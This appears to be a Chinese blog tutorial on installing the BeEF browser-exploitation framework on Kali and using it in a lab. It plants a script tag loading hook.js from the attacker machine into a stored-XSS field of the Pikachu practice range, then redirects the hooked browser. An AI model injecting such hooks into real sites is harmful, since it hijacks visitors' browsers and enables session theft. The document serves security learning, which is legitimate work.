XSS另类攻击(四)kali系统beef-xss安装和使用

于 2024-06-01 16:36:53 发布
阅读量850 收藏 21
点赞数 25
分类专栏: 跟我学网安知识 文章标签: 网络安全 XSS另类攻击
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuqixiufen2/article/details/139375738
版权

★★免责声明★★
文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与学习之用,读者将信息做其他用途,由Ta承担全部法律及连带责任,文章作者不承担任何法律及连带责任。

1、环境说明

kali系统,ip:192.168.242.4 ,攻击机

win7系统,ip: 192.168.242.5 ,靶机或部署服务机器

本文是为了下一篇《XSS另类攻击(五)Flash钓鱼配合MSF捆绑上线》准备。

2、kali系统配置准备

2.1、修改更新源目录
# 打开配置文件,按i进入编辑,按esc键退出编辑,输入【:wq!】保存
vim /etc/apt/sources.list

# 建议使用中科大或清华的,阿里最近经常出现问题(日期:2024-05-30)
# 中科大
deb https://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src https://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
# 清华
deb https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main non-free contrib
deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main non-free contrib
# 阿里
deb https://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src https://mirrors.aliyun.com/kali kali-rolling main non-free contrib

在这里插入图片描述

2.2、增加数字签名
# 1.下载签名
wget archive.kali.org/archive-key.asc
# 2.安装签名
apt-key add archiv./e-key.asc
# 3.更新一下
apt-get update

修改新的源目录,一定要下载和安装签名,不然无法使用下载。

参考博客:https://blog.csdn.net/weixin_43343679/article/details/133500343

2.3、修改docker镜像源

一般情况一下,镜像源和更新源目录设置一样的。

# 创建或打开daemon.json
vim /etc/docker/daemon.json

# 按I键进入编辑状态,退出按Esc,保存按【:wq!】,退出不保存按【:q!】。

# daemon.json文件加入以下内容,如果已经存在文件,有配置就不需要再添加
{
    "registry-mirrors": ["https://mirrors.ustc.edu.cn"]
}
# 中科大
https://mirrors.ustc.edu.cn
# 清华
https://mirrors.tuna.tsinghua.edu.cn
# 阿里
https://mirrors.aliyun.com

3、安装beef-xss

注意安装时,先切换到root账号

# 切换到root账号
sudo su
# 先升级
apt-get update
# 安装命令
apt-get install beef-xss
3.1、查看或修改密码

如果忘记密码或者想修改密码,可以到是/usr/share/beef-xss/config.yaml 配置文件查看,是明文存储的。修改完需要重启服务才会生效。

# 1、打开配置文件
vim /usr/share/beef-xss/config.yaml
# 2、重启beef-xss服务
systemctl restart beef-xss

在这里插入图片描述

3.2、启动服务

首次启动,会要求修改密码,默认用户名/密码都是:beef,修改密码不可以beef。

# 启动命令
beef-xss

看到关键字:active (running) ,绿色才是启动成功。

在这里插入图片描述

访问后台地址:http://ip:3000/ui/panel

在这里插入图片描述

3.3、常用命令
# 启动beef-xss命令,默认用户名/密码都是:beef,要求修改密码
beef-xss
# 停止beef-xss服务命令
service beef-xss stop 
# 重启beef-xss服务
systemctl restart beef-xss
3.4、异常情况参考

如果启动服务后发现访问不了,可以参考:https://wiki.bafangwy.com/project-4/doc-322/ 。

4、beef-xss使用示例说明

以pikachu靶场的存储型XSS使用作为使用示例说明,

# 勾子脚本,IP地址是部署beef-xss服务的IP
<script src="http://192.168.242.4:3000/hook.js"></script>

把勾子脚本放到pikachu靶场的存储型XSS的留言框提交,

在这里插入图片描述

beef-xss后台刷新就可以看到被攻击的记录。
在这里插入图片描述

比如设置目标地址重定向想要的地址,设置完点按钮Execute,如果用户停留在目标页面或从其他页面再次访问目标页面就会自动重定向,但是如果没有再去点按钮Execute就不会重定向。

操作路径:

Commands
->Browser
->Hooked Domain
–>Redirect Browser

在这里插入图片描述

更多详细用法请使用参考:
https://bbs.huaweicloud.com/blogs/392268
https://blog.csdn.net/qq_53517370/article/details/128992559

5、我的公众号

敬请关注我的公众号:大象只为你,持续更新网安相关知识中…

大象只为你
关注
  • 25
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
跨站脚本攻击--利用BeEF 执行 XSS 攻击
weixin_69826880的博客
06-26 637
跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。靶场:kali攻击者),32位win7(被攻击者)攻击环境:kali安装BEEF,32位win7站点搭建BeEF是日前最强大的浏览器开源渗透测试框架,通过X55漏洞配合JS脚本和 Metasploit进行渗透;BeEF是基于Ruby语言编写的,并且支持图形化界面,操作简单。
Kali Linux-网络安全之-XSS 跨站脚本攻击原理及 DVWA 靶机的搭建
xueshenlaila的博客
12-31 1340
XSS 跨站脚本攻击 使用 JavaScript 创建 Cookie JavaScript 可以使用 document.cookie 属性来创建 、读叏、及删除 cookie。 例 1:JavaScript 中,创建 cookie 如下所示: document.cookie=“username=John Doe”; 例 2:你还可以为 cookie 添加一个过期时间(以 UTC 戒 GMT 时间)。默认情况下,cookie 在 浏览器关闭时删除: document.cookie=“username=John
kalibeef使用_kali没有beef网络安全开发基础培训
2301_76223496的博客
04-17 929
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。接着访问有勾子的页面http://192.168.133.131:3000/demos/basic.html 这里的主机名和端口号要按照你设置的来修改, 这里要注意一下kalibeef版本的勾子不支持IE8,最新版或者旧一些的版本可以。④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等。
kali安装 beef-xss
挖到0day了吗?
02-27 660
XSS攻击(Cross-Site Scripting)是指攻击者在网页中注入恶意脚本代码,使受害者在浏览器中运行该脚本,从而达到攻击目的。beef是一种利用浏览器漏洞的攻击工具,可以在浏览器端运行恶意脚本。本文将介绍安装beef。新版的kail已经不自带beef工具了,需要自己下载。
beef-xss详细教程(一文带你学会beef) | Kali安装beef | beef-xss反射型,储存型利用 | beef实现Cookie会话劫持 | 键盘监听 | 浏览器弹窗,重定向等
热门推荐
Martin-share的博客
02-12 1万+
beef-xss详细教程(一文带你学会beef) | Kali安装beef | beef-xss反射型,储存型利用 | beef实现Cookie会话劫持 | 键盘监听 | 浏览器弹窗,重定向等
beef-xss安装使用
Bu2n的博客
12-07 3316
文章目录kali安装与更新软件源beef-xss安装快速上手beef-xss kali安装与更新软件源 传送门 beef-xss安装 sudo apt-get install beef-xss sudo beef-xss 第一次启动beef要修改密码,要仔细看清楚 快速上手beef-xss http://127.0.0.1:3000/ui/panel beef的管理面板 输入自己的账号密码默认beef beef 这样就能进入到管理页面 查看kali的ip地址 构造下面js代码,想办法给其他人
Arch安装beEF-xss
CryMang的博客
03-07 4393
beEF-xss框架安装下载beEF安装ruby安装gem安装bundler设置环境变量安装beEF启动beEF 下载beEF 链接: https://github.com/beefproject/beef. git clone https://github.com/beefproject/beef 安装ruby sudo pacman -S ruby ruby-dev 安装gem sudo pacman -S gem 注:安装完gem后,gem需要关闭IPV6支持,否则无法下载和更新 安装bundl
kali安装BeEF发动XSS攻击
weixin_43148062的博客
04-18 5738
BeEF( The Browser Exploitation Framework) 是由Wade Alcorn 在2006年开始创建的,至今还在维护。是由ruby语言开发的专门针对浏览器攻击的框架。BeEF的总体思路就是在内网下通过arp欺骗,修改response包,加入我们的钩子。 1. 安装 root@kali:~# apt-get install beef-xss 2.启动 切换到Be...
kali,beef-xss安装使用
m0_73581247的博客
06-22 1705
1.Beef工具 1.1 Beef工具介绍   Beef是日前最强大的浏览器开源渗透测试框架,通过X55漏洞配合JS脚本和 Metasploit进行渗透; Beef是基于Ruby语言编写的,并且支持图形化界面,操作简单。   新版的kail已经不自带beef工具了,需要自己下载。并且目前只支持macos和Linux系统。1.2 Beef工具安装   在安装beef工具之前建议更新一下源   apt-get update   apt-get install beef-xss 时间比较久,可以去放松一会   启
【PDF-XSS攻击】Java项目-上传文件-解决PDF文件XSS攻击
04-07
PDF-XSS实例文件
预防XSS攻击和SQL注入XssFilter
05-19
XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如同源策略(same origin...
xss站点攻击过滤jar包antisamy-1.5.1
10-17
ntisamy是owasp的开源项目,它用来确保用户输入的HTML/CSS符合应用规范的API,可以有效防止xss攻击。它提供了用于验证用户输入的富文本以防御跨站脚本的API
xss-labs-master.rar
05-09
"xss-labs-master.rar" 提供了一个针对XSS漏洞的专项练习平台,旨在帮助初学者及安全爱好者提升对XSS攻击的理解和防御能力。这个靶机资源共分为二十个关卡,由浅入深,逐步引导用户掌握XSS攻防的核心技巧。 一、XSS...
xss-filter-spring-boot-starter:springboot自动xss
05-17
xss-filter-spring-boot-starter springboot自动xss 使用方法在项目的pom.xml中加入依赖即口 <groupId>com.djk</groupId> <artifactId>xss-filter-spring-boot-starter <version>0.0.1 目前支持3种入参数xss...
linux-kali利用BeEF 执行 XSS 攻击
LCH14777475118的博客
06-26 300
文件,在文件里面找到这两串代码。软件(下载最新版的就可以),复制为一个副本,将副本修改为。安装目录中启动它(注意:新的。软件可以用来进行站点搭建。就勾上了靶机所在的浏览器了。,双击从记事本里面打开。,或者可以在配置文件。
利用BeEF执行XSS攻击
m0_70185580的博客
05-31 499
XSS攻击(Cross-Site Scripting)是指攻击者在网页中注入恶意脚本代码,使受害者在浏览器中运行该脚本,从而达到攻击目的。BeEF是一种利用浏览器漏洞的攻击工具,可以在浏览器端运行恶意脚本。当攻击成功后,可以在BeEF的控制面板中查看受害者的浏览器信息,并控制其浏览器。这段代码会将BeEF的hook.js文件注入到目标网站中,并启动BeEF的hook服务。接下来,需要获取要攻击的网站的URL。当受害者在浏览器中打开包含恶意脚本的页面时,BeEF就会启动并开始执行攻击
2024年网络安全山东省赛-SMB信息收集解析(中职组)_使用访问工具对服务器服务访问,将服务器中管理员桌面的文本文档里的内容作为 flag
最新发布
2401_84252281的博客
04-26 717
任务环境说明:服务器场景:Server1。
kali如何安装beef-xss
05-14
要在Kali Linux上安装BeEF(The Browser Exploitation Framework),请按照以下步骤进行: 1. 打开终端并更新软件包列表: ``` sudo apt-get update ``` 2. 安装BeEF: ``` sudo apt-get install beef-xss ``` ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值